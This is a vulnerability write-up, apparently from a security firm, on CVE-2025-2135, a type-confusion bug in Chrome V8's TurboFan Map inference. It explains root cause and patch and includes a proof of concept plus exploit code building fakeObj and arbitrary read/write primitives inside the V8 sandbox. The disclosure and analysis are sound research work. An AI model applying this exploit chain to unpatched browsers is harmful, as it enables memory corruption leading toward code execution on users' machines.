We discovered a type-confusion vulnerability in Chrome’s V8 engine that can be exploited to achieve remote code execution. The bug was assigned CVE-2025-2135, and we successfully used it to pwn Google’s V8CTF as a zero-day.
The root cause lies in TurboFan’s InferMapsUnsafe() function, which fails to handle aliasing when processing the newly introduced TransitionElementsKindOrCheckMap node. This allows attackers to trigger type confusion between object arrays and double arrays, leading to arbitrary memory read/write within the V8 sandbox.
In this post, we’ll walk through the bug’s root cause, demonstrate a proof of concept, detail the step-by-step exploitation process, and examine how Google patched the vulnerability.
Check out the full CVE-2025-2135 bug report here↗.
Background
Before diving into the vulnerability, let’s cover some foundational concepts about V8, Chrome’s JavaScript engine. If you’re already familiar with V8 internals, feel free to skip ahead to the Root Cause Analysis.
V8 and Just-In-Time Compilation
V8 is the JavaScript engine that powers Google Chrome and Node.js. Its primary job is to parse and execute JavaScript as efficiently as possible. To achieve near-native performance, V8 uses a multi-tiered execution pipeline: code starts in an interpreter called Ignition, and as functions are called repeatedly, hot code paths are progressively promoted to more aggressive just-in-time (JIT) compilers that generate optimized machine code.

TurboFan is V8’s most aggressive optimizing compiler. It collects runtime type feedback from the interpreter, such as “this variable has always been an integer” or “this array has always contained doubles”, and uses those observations to generate highly specialized machine code. This speculative optimization delivers excellent performance when the assumptions hold, but if they are violated at runtime, V8 must deoptimize and fall back to the interpreter.
Vulnerabilities emerge when the compiler makes an incorrect assumption but fails to deoptimize. The generated machine code then operates on data with the wrong type in mind, leading to type confusion.
Maps: V8’s Hidden Classes
JavaScript is dynamically typed, meaning objects can have properties added or removed at any time. To optimize property access despite this flexibility, V8 assigns each object a Map (also known as a “hidden class” or “shape” in other engines). A Map describes an object’s layout: what properties it has, their types, and where they are stored in memory.
// These two objects share the same Map (same structure)
let a = { x: 1, y: 2 };
let b = { x: 3, y: 4 };
// Adding a property transitions 'a' to a new Map
a.z = 5; // 'a' and 'b' now have different Maps
When two objects share the same Map, V8 can access their properties at fixed memory offsets instead of performing expensive dictionary lookups. The JIT compiler inserts Map checks to verify objects have the expected layout before executing optimized code. If a check fails, execution deoptimizes.
How V8 Classifies Arrays: ElementsKind
Beyond object properties, V8 also tracks the types of values stored in arrays through a system called ElementsKind. Rather than using a single generic representation, V8 specializes array storage based on element types. An array containing only small integers is classified as PACKED_SMI_ELEMENTS and stored as tagged integers, which is the most memory-efficient layout. When a floating-point number is introduced, the array transitions to PACKED_DOUBLE_ELEMENTS, where values are stored as raw, unboxed 64-bit doubles. If an arbitrary JavaScript object is stored, it transitions further to PACKED_ELEMENTS, where values are stored as tagged pointers.

These transitions are irreversible. Once an array moves from SMI to DOUBLE by storing a float, or from DOUBLE to ELEMENTS by storing an object, it never transitions back. Each ElementsKind corresponds to a different Map, and the JIT compiler generates specialized machine code for each variant.
The reason these different storage formats matter comes down to how V8 represents values in memory. V8 uses a technique called pointer tagging to distinguish between value types at runtime. With V8’s pointer compression on 64-bit systems, each value slot in a PACKED_ELEMENTS array is 32 bits wide, and the lowest bit serves as a tag: if it is 0, the value is a small integer (Smi) with the actual number shifted left by one bit; if it is 1, the value is a compressed pointer to a heap object. A PACKED_DOUBLE_ELEMENTS array, by contrast, stores raw IEEE 754 64-bit floating-point values with no tagging at all, each occupying a full 64-bit slot. The same bit pattern in memory therefore has a completely different meaning depending on which ElementsKind the executing code assumes.

This distinction is security-critical. If the compiler believes an array is PACKED_DOUBLE_ELEMENTS but the array actually holds tagged object pointers, a read will reinterpret two adjacent 32-bit tagged values as a single 64-bit float, leaking pointer information. Conversely, a write will inject a raw 64-bit double into slots that V8 later treats as tagged pointers, allowing an attacker to forge arbitrary object references. This is type confusion, and it is exactly the class of vulnerability we exploit in this post.
Sea of Nodes and the Effect Chain
During JIT compilation, V8 converts JavaScript into an intermediate representation (IR) called a sea of nodes. If you’re familiar with LLVM’s SelectionDAG↗, sea of nodes is a similar concept. Unlike a traditional control-flow graph where instructions are ordered sequentially within basic blocks, the sea of nodes represents the program as a graph where each node is a single operation. Edges between nodes encode three kinds of dependencies:
- Value edges carry computed results between operations. For example, an
addnode has value edges pointing to its two operandsxand1. These are the data-flow dependencies you would find in any dataflow graph. - Control edges enforce execution ordering at branch points and merges, similar to edges in a traditional control-flow graph. A conditional like
if (x > 0)produces control edges to its true and false branches. - Effect edges link operations that have observable side effects such as memory reads, writes, or function calls. Pure computations (like local arithmetic) have no effect edges and can float freely in the graph, giving the optimizer maximum flexibility to reorder them. Only side-effecting operations are constrained by the effect chain.
To illustrate effect edges concretely, consider the following expression:
obj[x] = obj[x] + 1;
The property load must happen before the addition, and the addition before the store. Effect edges enforce this ordering, forming a chain: JSLoadNamed → SpeculativeSafeIntegerAdd → JSStoreNamed (with an intermediate Checkpoint node for deoptimization). The following Turbolizer screenshot shows this effect chain in practice (dotted lines represent effect edges):
![Effect chain for obj[x] = obj[x] + 1](https://blog-cdn.zellic.io/blog/assets/images/doar-e-effects-b58ce546f39617738f69476ecb346dc5.png)
obj[x] = obj[x] + 1 [1]The effect edges form a chain that records the ordering of all side-effecting operations. When TurboFan determines what Map an object has at a given point in the program, it walks backward along this effect chain, searching for witness nodes that constrain the object’s Map, such as a CheckMaps node or an ElementsKind transition node. For those familiar with symbolic execution, traversing a witness node in TurboFan is analogous to crossing a type assertion which corresponds to adding a solver constraint. Once the traversal finds a CheckMaps(Map A), the compiler asserts the object’s Map is exactly Map A at that point, eliminating all other possibilities. Of course, this is just an analogy.
However, if the traversal passes through a node with potential side effects (like a function call) before finding a witness, the inferred Map is considered unreliable, since the side effect could have changed the object’s Map. This backward traversal is performed by a function called InferMapsUnsafe(), and it is where the vulnerability in this post ultimately lies.

Is the effect chain always linear?
In straight-line code, yes. Each side-effecting node has exactly one effect input and one effect output, forming a linear chain. The code confirms this with DCHECK_EQ(1, effect->op()->EffectInputCount()).
But at control flow merge points, the effect chain is not linear. V8 uses EffectPhi nodes to merge multiple effect chains (one from each branch). Looking at InferMapsUnsafe() in node-properties.cc, here’s how it handles this:
- If/else merge (
EffectPhiwith aMergecontrol): it gives up and returnskNoMaps(no inference possible, because the Map could differ on each branch). - Loop (
EffectPhiwith aLoopcontrol): it follows the loop’s entry edge (effect input 0, i.e. outside the loop) and continues walking backwards, but marks the result askUnreliableMaps, because the loop body might have changed the Map. - Unknown nodes with multiple effect inputs: it also gives up and returns
kNoMaps.
So InferMapsUnsafe() can walk backwards precisely because it only walks along a single linear chain. The moment it hits an EffectPhi (where chains merge), it either bails out entirely or takes the conservative path.
Root Cause Analysis
To understand this vulnerability, we first need to examine TurboFan’s JIT compilation pipeline. The diagram below illustrates how JavaScript code flows through various optimization phases before becoming machine code.

Type Speculation
As introduced in the Background section, TurboFan operates on a sea-of-nodes IR and walks the effect chain to infer object Maps. The TurboFan optimizer performs a series of aggressive optimizations on this graph representation. During the JSNativeContextSpecialization phase, the compiler leverages runtime feedback (ElementAccessFeedback) to narrow down types for element access operations.
When processing reads and writes on arrays and array-like objects, the optimizer first checks whether the access site is monomorphic, meaning the feedback indicates all observed accesses share the same element layout.
The Monomorphic Optimization Path
When access is monomorphic (access_infos.size() == 1), TurboFan checks whether the receiver needs an ElementsKind transition. Monomorphic access implies that subsequent optimizations depend on a stable, predictable element layout. If the receiver is not already in the target layout, TurboFan explicitly inserts a transition node in the IR to ensure consistent type assumptions for downstream optimizations.
The relevant code is shown below:
// src/compiler/js-native-context-specialization.cc
Reduction JSNativeContextSpecialization::ReduceElementAccess(
Node* node, Node* index, Node* value,
ElementAccessFeedback const& feedback) {
...
// Check for the monomorphic case.
PropertyAccessBuilder access_builder(jsgraph(), broker());
if (access_infos.size() == 1) {
ElementAccessInfo access_info = access_infos.front();
if (!access_info.transition_sources().empty()) {
DCHECK_EQ(access_info.lookup_start_object_maps().size(), 1);
// Perform possible elements kind transitions.
MapRef transition_target = access_info.lookup_start_object_maps().front();
ZoneRefSet<Map> sources(access_info.transition_sources().begin(),
access_info.transition_sources().end(),
graph()->zone());
effect = graph()->NewNode(simplified()->TransitionElementsKindOrCheckMap(
ElementsTransitionWithMultipleSources(
sources, transition_target)),
receiver, effect, control);
} else {
// Perform map check on the {receiver}.
access_builder.BuildCheckMaps(receiver, &effect, control,
access_info.lookup_start_object_maps());
}
// Access the actual element.
ValueEffectControl continuation =
BuildElementAccess(receiver, index, value, effect, control, context,
access_info, feedback.keyed_mode());
value = continuation.value();
effect = continuation.effect();
control = continuation.control();
} else {
...
}
ReplaceWithValue(node, value, effect, control);
return Replace(value);
}
When feedback indicates the receiver may originate from multiple ElementsKind sources (e.g., some objects are still PACKED_SMI_ELEMENTS while the target layout is PACKED_ELEMENTS), TurboFan wraps all source Maps into a ZoneRefSet<Map> and constructs an ElementsTransitionWithMultipleSources structure. It then generates a TransitionElementsKindOrCheckMap IR node with two semantic branches:
- If the receiver’s Map belongs to the source set, perform an
ElementsKindtransition to the target layout. - If already in the target layout, perform a Map check to verify optimization assumptions.
Through this node, the element layout along the access path is forced to converge to a unified Map, establishing a stable foundation for subsequent optimizations.
Map Inference
After the JSNativeContextSpecialization phase, TurboFan attempts to infer the receiver’s actual Map under the current effect state. This work is performed by NodeProperties::InferMapsUnsafe(), which traverses up the effect chain looking for witness nodes that constrain the receiver’s Map, such as CheckMap, Allocate, or TransitionElementsKindOrCheckMap.
To describe the reliability of inference results, V8 defines the following enumeration:
// Walks up the {effect} chain to find a witness that provides map
// information about the {receiver}. Can look through potentially
// side effecting nodes.
enum InferMapsResult {
kNoMaps, // No maps inferred.
kReliableMaps, // Maps can be trusted.
kUnreliableMaps // Maps might have changed (side-effect).
};
This enumeration determines whether the optimizer can rely on the inferred Map.
kNoMaps— No node providing Map information was found; the optimizer cannot use Map-dependent optimization paths.kReliableMaps— A sufficiently strong witness was found (such asCheckMaporElementsKindtransition), indicating the receiver has a unique and dependable Map after that node.kUnreliableMaps— The traversal passed through nodes with potential side effects that could change the receiver’s Map; although a Map was inferred, it cannot be fully trusted.
Here is the key snippet from InferMapsUnsafe() handling TransitionElementsKindOrCheckMap:
// static
NodeProperties::InferMapsResult NodeProperties::InferMapsUnsafe(
JSHeapBroker* broker, Node* receiver, Effect effect,
ZoneRefSet<Map>* maps_out) {
...
InferMapsResult result = kReliableMaps;
while (true) {
switch (effect->opcode()) {
...
case IrOpcode::kTransitionElementsKindOrCheckMap: {
Node* const object = GetValueInput(effect, 0);
if (IsSame(receiver, object)) {
*maps_out = ZoneRefSet<Map>{
ElementsTransitionWithMultipleSourcesOf(effect->op()).target()};
return result;
}
break;
}
...
}
// Stop walking the effect chain once we hit the definition of
// the {receiver} along the {effect}s.
if (IsSame(receiver, effect)) return kNoMaps;
// Continue with the next {effect}.
DCHECK_EQ(1, effect->op()->EffectInputCount());
effect = NodeProperties::GetEffectInput(effect);
}
The intended logic is that when a transition node operates on the receiver itself, the receiver’s Map has been forcibly transitioned to the unique target Map, so kReliableMaps can be returned immediately. This check is safe when the target object is unambiguous and unique.
The Root Cause: Missing Alias Check
The vulnerability stems from a complete lack of aliasing checks in this logic. The diagram below illustrates the problematic code path.

As shown, IsSame(receiver, object) checks whether two nodes resolve to the same IR node, looking past CheckHeapObject and TypeGuard wrappers. However, in the sea-of-nodes model, two structurally different IR nodes (e.g., two distinct Parameter nodes for different function arguments) can reference the same underlying HeapObject at runtime. This means even when the condition is false, receiver and object may still alias the same object.
Let’s look at the code again. What happens if IsSame is false?
InferMapsResult result = kReliableMaps;
while (true) {
switch (effect->opcode()) {
...
case IrOpcode::kTransitionElementsKindOrCheckMap: {
Node* const object = GetValueInput(effect, 0);
if (IsSame(receiver, object)) { // <--- What happens if IsSame is false?
*maps_out = ZoneRefSet<Map>{
ElementsTransitionWithMultipleSourcesOf(effect->op()).target()};
return result;
}
break;
}
...
}
...
}
The current result will continue through the loop, potentially ultimately returning kReliableMaps. This isn’t necessarily valid: we may have passed a TransitionElementsKindOrCheckMap node that affects receiver (object and receiver are different pointers, but refer to the same HeapObject).
During aliasing, the following occurs:
- The
object’sElementsKindhas already been transitioned at the transition node. - Since
receiverandobjectmay be aliases, this transition also affectsreceiver. However,InferMapsUnsafe()skips this case whenIsSame(receiver, object) == false, not treating it as a witness affecting the receiver’s Map. - Subsequent effect chain traversal also fails to record the uncertainty introduced by this transition.
- As a result, the function incorrectly returns
kReliableMapsinstead of the saferkUnreliableMaps.
The optimizer then performs type specialization based on the incorrect assumption that the receiver’s Map is stable, while the actual object layout has already been transitioned. The generated machine code interprets the object with incorrect layout, ultimately causing type confusion.
In summary, the missing alias check causes InferMapsUnsafe() to incorrectly assess Map reliability, leading the optimizer to generate unsafe code based on invalidated type assumptions. This is the root cause of the vulnerability.
Proof of Concept
The following proof of concept (POC) reproduces the type-inference vulnerability described above in a minimal way:
function main() {
function f0(v2, v3) {
// These element accesses collect type feedback. During optimization,
// TurboFan inserts TransitionElementsKindOrCheckMap nodes based on this feedback.
var v4 = v3[0]; // Node B (v3) in the root cause diagram
var v5 = v2[0]; // Node A (v2, the receiver) in the root cause diagram
// indexOf is a Call node (side effect) in the effect chain.
Array.prototype.indexOf.call(v3);
}
%PrepareFunctionForOptimization(f0);
var v0 = new Array(1);
v0[0] = 'tagged';
// First call: v2=v0 (HOLEY_ELEMENTS), v3=[1] (PACKED_SMI_ELEMENTS)
// This collects monomorphic type feedback for the element accesses.
f0(v0, [1]);
var v1 = new Array(1);
v1[0] = 0.1;
%OptimizeFunctionOnNextCall(f0);
// Second call: v2 and v3 are BOTH v1 (HOLEY_DOUBLE_ELEMENTS).
// In the IR, v2 and v3 are different Parameter nodes (Node A and Node B),
// but at runtime they reference the same HeapObject.
f0(v1, v1);
}
main();
main();
// flags: --allow-natives-syntax
The core purpose of this POC is to make TurboFan form a stable but incorrect set of type assumptions during the optimization of f0. The first call provides monomorphic feedback for array access, while the second call uses a completely different ElementsKind, forcing the optimizer to rely on the Map-inference logic analyzed earlier. It is precisely during this inference phase that, due to the lack of alias checking for parameters, InferMapsUnsafe() incorrectly determines that the current array’s Map is reliable, continuing optimization along the incorrect type path.
Running this POC on a debug build of d8 confirms the type confusion. The runtime expects a FixedDoubleArray (because the JIT-compiled code assumes double elements), but encounters a FixedArray (object elements) instead:
# Fatal error in ../../src/objects/object-type.cc, line 82
# Type cast failed in CAST(elements) at ../../src/builtins/builtins-array-gen.cc:1353
Expected FixedDoubleArray but found 0x32ae00288a31: [FixedArray]
- map: 0x32ae00000565 <Map(FIXED_ARRAY_TYPE)>
- length: 1
0: 0x32ae00288a3d <HeapNumber 0.1>
Exploitation
Based on the root cause analysis, the issue does not originate from indexOf itself but from the compiler’s incorrect type inference for v3, leading to type confusion. This erroneous type information allows attackers to trigger a series of abnormal behaviors, ultimately achieving arbitrary memory read/write within the V8 sandbox.
Let’s take a look at the exploitation step-by-step.
Step 1: Trigger type confusion to obtain a fakeObj primitive.
The following diagram shows how the type confusion manifests when the compiler misinterprets array element types.

When the compiler incorrectly infers v3 as a double array, we can exploit this by replacing indexOf with push. The push operation writes an eight-byte double value directly into the element storage area, but since v3 is actually an object array, the double data is interpreted by V8 as an object pointer.
function f0(v2, v3) {
var v4 = v3[0];
var v5 = v2[0];
// v3 is incorrectly inferred as double array due to aliasing
// This push writes a crafted double that will be interpreted as an object pointer
Array.prototype.push.call(v3, 4.950618252845e-311);
}
By crafting this double value to point to a memory region we control, we obtain the classic fakeObj primitive, allowing us to disguise an arbitrary memory address as a legitimate JavaScript object.
Step 2: Heap layout for a fake array.
We carefully arrange a forged JSArray structure in memory. The key fields are map, properties, elements, and length:
// Layout: map | properties | elements | length
// 0x00189c39 0x00000745 0x000495bd 0x00000466
fake_arr_buf = [
3.9490349638436e-311, 2.3893674090823e-311,
1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1
];
helper.mark_sweep_gc(); // Stabilize heap layout
Step 3: Trigger and retrieve the fake object.
After triggering the vulnerability with aliased arguments, we retrieve our fake array object. Recall that in Step 1, the type-confused push wrote a crafted 8-byte double into v1’s backing store. Because v1 is actually an object array, V8 interprets those bytes as a tagged pointer when reading them back. The double was crafted so that it decodes to a compressed pointer pointing into fake_arr_buf’s backing store, exactly where the fake JSArray structure is laid out. Because each double element occupies 8 bytes while each tagged pointer slot is only 4 bytes, the single pushed double spans two object-array slots; reading v1[2] retrieves the upper half, which is the forged pointer to our fake array:
f0(v1, v1); // v1 passed as both v2 and v3, triggering the alias issue
v1[5] = 0.1; // Ensure array is in expected state
fake_arr = v1[2]; // The crafted double is now interpreted as a pointer to our fake JSArray
Step 4: Construct arbitrary read/write primitives.
With our fake array, we can control its elements pointer to achieve arbitrary memory access. By pointing elements to any address, subsequent array accesses read from or write to that location:
function arbRead(where) {
fake_arr_buf[1] = helper.pair_i32_to_f64(where - 8, 0x60000);
return helper.f64toi64(fake_arr[0]);
}
function arbWrite(where, what) {
fake_arr_buf[1] = helper.pair_i32_to_f64(where - 8, 0x60000);
fake_arr[0] = helper.i64tof64(what);
}
Step 5: Exploit the bug.
Finally, we demonstrate the arbitrary write capability by modifying a victim array’s length field:
var victim_array = [1.1, 1.2];
console.log("Before: " + victim_array.length); // 2
arbWrite(0x4017d + 1 + 0xc, 0x2333n);
console.log("After: " + victim_array.length); // 0x2333
At this point, we have full arbitrary memory read/write within the V8 sandbox, laying the foundation for code execution and sandbox escape.
We successfully exploited this vulnerability in Google’s V8CTF program↗, achieving a confirmed zero-day submission on March 6, 2025.

Patch Analysis
The fix is straightforward. In InferMapsUnsafe(), when encountering a TransitionElementsKindOrCheckMap node where the target object is not the same node as the receiver, set result = kUnreliableMaps before continuing the effect chain traversal. This acknowledges that the two nodes may alias at runtime, and therefore the Map inference cannot be trusted.
case IrOpcode::kTransitionElementsKindOrCheckMap: {
Node* const object = GetValueInput(effect, 0);
if (IsSame(receiver, object)) {
*maps_out = ZoneRefSet<Map>{...};
return result;
}
// Fix: mark as unreliable when receiver and object may alias
result = kUnreliableMaps;
break;
}
A Recurring Pattern
This vulnerability was introduced by commit b8d3f7d0cf↗, which added the TransitionElementsKindOrCheckMap IR node to optimize Map loads. The pattern is familiar; a new IR node is introduced for performance gains, but its side effects are not fully accounted for in InferMapsUnsafe(), leading to type confusion.
This is not the first time. CVE-2020-6418 had the same issue with JSCreate nodes. More broadly, CVE-2020-16009 and CVE-2021-30632 show that V8’s Map-tracking mechanisms remain a recurring attack surface. Every time a new optimization lands, there’s a chance the Map-inference logic hasn’t caught up.
Interestingly, when we first fuzzed out this bug, we hadn’t done any root cause analysis. We replaced indexOf with push on a hunch, and just like that, we had a working fakeObj primitive. V8 type confusions are becoming so formulaic that exploitation feels like muscle memory.
About Us
Zellic specializes in securing emerging technologies. Our security researchers have uncovered vulnerabilities in the most valuable targets, from Fortune 500s to DeFi giants.
Developers, founders, and investors trust our security assessments to ship quickly, confidently, and without critical vulnerabilities. With our background in real-world offensive security research, we find what others miss.
Contact us↗ for an audit that’s better than the rest. Real audits, not rubber stamps.
References
[1] Jeremy Fetiveau, “Introduction to TurboFan,” doar-e.github.io, 2019. https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/↗
[2] Alex Maclean and Justin Fargnoli, “A Beginner’s Guide to SelectionDAG,” LLVM Dev Meeting, 2024. https://llvm.org/devmtg/2024-10/slides/tutorial/MacLean-Fargnoli-ABeginnersGuide-to-SelectionDAG.pdf↗